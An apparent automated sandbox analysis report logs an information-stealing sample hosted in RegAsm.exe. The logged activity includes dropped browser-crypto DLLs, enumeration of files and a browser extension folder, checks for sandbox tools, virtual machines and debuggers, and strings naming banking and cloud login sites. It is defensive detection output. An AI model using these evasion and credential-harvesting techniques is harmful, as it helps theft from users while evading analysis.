                    Source: Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418970
                    Source: file.exeStatic PE information: section name: .00cfg
                    Source: sqln[1].dll.1.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                    Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00538CCD push ecx; ret 0_2_00538CE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045225C push ecx; ret 0_2_004975C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041A8B5 push ecx; ret 1_2_0041A8C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C41BF9 push ecx; ret 1_2_19DE4C03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C410C8 push ecx; ret 1_2_19E43552
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418970 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00418970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                    Source: c:\users\user\desktop\file.exeEvent Logs and Signature results: Application crash and keyboard check
                    Source: file.exe, RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                    Source: file.exe, RegAsm.exeBinary or memory string: SBIEDLL.DLL
                    Source: file.exe, RegAsm.exeBinary or memory string: API_LOG.DLL
                    Source: RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\IDHIIJJJKEGI\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeAPI coverage: 1.0 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004103D0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410502h1_2_004103D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDB23 FindFirstFileExW,0_2_004EDB23
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE007 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004EE007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00416740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00417800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416F50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004173C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040AAE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00416BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004105A0 GetSystemInfo,wsprintfA,1_2_004105A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: GIJKKKFC.1.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\tL
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: GIJKKKFC.1.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: GIJKKKFC.1.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: GIJKKKFC.1.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: GIJKKKFC.1.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: GIJKKKFC.1.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: GIJKKKFC.1.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: GIJKKKFC.1.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: GIJKKKFC.1.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: GIJKKKFC.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: GIJKKKFC.1.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: GIJKKKFC.1.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: GIJKKKFC.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: GIJKKKFC.1.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: GIJKKKFC.1.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: GIJKKKFC.1.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: GIJKKKFC.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: GIJKKKFC.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: GIJKKKFC.1.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-89379
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-90482
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A8405 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004A8405
